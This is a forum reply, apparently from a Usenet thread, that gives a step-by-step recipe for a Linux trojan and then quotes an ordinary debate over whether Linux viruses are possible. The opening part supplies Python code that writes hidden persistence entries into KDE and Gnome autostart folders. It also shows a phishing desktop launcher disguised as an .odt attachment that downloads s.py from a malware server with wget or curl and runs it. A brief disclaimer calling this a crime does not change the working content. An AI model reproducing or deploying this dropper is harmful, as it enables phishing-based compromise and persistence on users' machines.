Re: How to write a linux virus

#

Write a piece of malware of your choice. Maybe as a Python script?
Good language, efficient code, pre-installed in most Linux distros and
powerful standard library support (for example, libraries for sending
HTTP requests and handling SMTP are part of most standard installs).
Place that malware on some web-server.
#

Your malware needs the ability to install a launcher for itself so
that it is started whenever the user logs in. As mentioned, for Gnome
that means creating a launcher description in the ~/.config/autostart
folder. For KDE just link to your executable from within the ~/.kde/
Autostart directory. To do that the malware code can either just force
the issue and copy a launcher or link to itself into both locations
(creating any directories along the way if they don't exist) or it can
be a bit smarter and choose the right thing to do based on the desktop
environment that it detects.

For example, to create the shortcut for KDE, all you need to write in
Python is:

import os
uname = os.getlogin()
drop_dir = “/home/%s/.kde/Autostart” % uname)
os.makedirs(drop_dir)
os.symlink("/home/%s/.local/.hidden/s.py" % uname, drop_dir+“/
s.py")

For Gnome the Python script instead needs to write a launcher into the
proper directory:

import os
relauncher_str = """
[Desktop Entry]
Type=Application
Name=Malware
Exec=python .local/.hidden/s.py
Icon=system-run
"""
uname = os.getlogin()
drop_dir = “/home/%s/.config/autostart” % uname
os.makedirs(drop_dir)
f = open(drop_dir+”/Malware.desktop”, “w”)
f.write(relauncher_str)
f.close()

Writing these autostart entries is probably some of the first action
that your malware should perform.
#

Now create a desktop launcher file for the installer of the malware,
which is different than the launcher we use to restart the malware
after a reboot. The desktop launcher for the installer is what we send
as attachment in the email to the targeted user. It's what the user
clicks on after they saved it. Try something like this:

[Desktop Entry]
Type=Application
Name=some_text.odt
Exec=bash -c 'URL=http://www.my_malware_server.com/s.py ;
DROP=~/.local/.hidden ;
mkdir -p $DROP;
if [ -e /usr/bin/wget ] ;
then wget $URL -O $DROP/s.py ;
else curl $URL -o $DROP/s.py ; fi;
python $DROP/s.py'
Icon=/usr/share/icons/hicolor/48x48/apps/ooo-writer.png

Hope it helps but i tell you that is crime act to create a linux virus
so never got o write it..

Trevor Hook.
On Mar 23, 5:01 am, houghi <hou...@xxxxxxxxxxxxxxxxxx> wrote:
Nikos Chantziaras wrote:
Same difference. There are enough people using it.

About 3%. The 97% of the rest are Macs and Windows boxes.

Others talk about other numbers.

Do you read security announcements?  It is *PROOF* that there are
exploitable bugs.  *PROOF*.  

Sight. I am not even going into the defence.

Why no one bothers to create malware that targets those exploits is up
to speculation.  I say it's because of the market share.  You however,
claim that "it can't be done".  Why can't it be done?  

So I need to proove a negative? Uh, sure.

Again, read the security announcements.  Bugs are found all
the time.  And you still claim "it can't be done?"  It *could* be done.

There is a difference between an exploitable bug and avirus. We are
talking about virusses (or even worms) The exploitable bugs you talk
about all need some sort of user interaction and thus become trojans.

  Software is software.  Why should it matter whether you run kTorrent
on Windows or Linux?  Will the Linux version be bugfree?  Why?  Same
goes for Mumble, Pidgin, etc.

OK, so you do not understand the difference between a bug and avirus.

Surely, it's a fact that there are exploits.  The question is *why*
crackers don't bother with the 3% Linux desktops and only target the 97%.

And it is also a fact that there are no virusses for Linux. The reason
crackers do not target the 3% is because it can not be done.

Remember the bug in Linux a few months ago where standard users could
easily get root access? That is about the most dangerous bug that
happend to be available in a long time and could have been deadly. Yet
still novirus, because it would have needed still a user interaction.

Now if you say if Linux is perceptable to attacks, then I say yes. I
even made a proof of concept. All you need to do is trick the user to do
something. Yet that is not avirus.

Compare it to people on Windows how get an attachment in zip that they
need to open, read the file inside, enter a password and still people
are doing it and installing that stuff.

I can write malicious code for Linux as well. That does not mean Linux
is unsafe. I know you wil stick with your point and keep shouting
*PROOF* and that I should read the security announcements and I will
keep saying "Virusses for Linux are not possible".

So if proof is so importand to you, why not find people to prove me
wrong? It is as if saying "We should not let people carry liquids into a
plane, because they could build a bomb." and then ignore the people who
know what they are talking about who say that it can't be done.

And again I am sure that if there were a way to write a Linuxvirus,
people would have done so already a long time ago. (Heck, I even took
weeks of to come up with my cunning trojan.)

So unless you have nothing new to add to the discussion, I think we
both made our point and I am awaiting the first Linuxvirusin the wild.

houghi
--
For a long time now I have tried simply to write the best I can. Sometimes I
have good luck and write better than I can.
                                                         -- Ernest Hemingway

.

Relevant Pages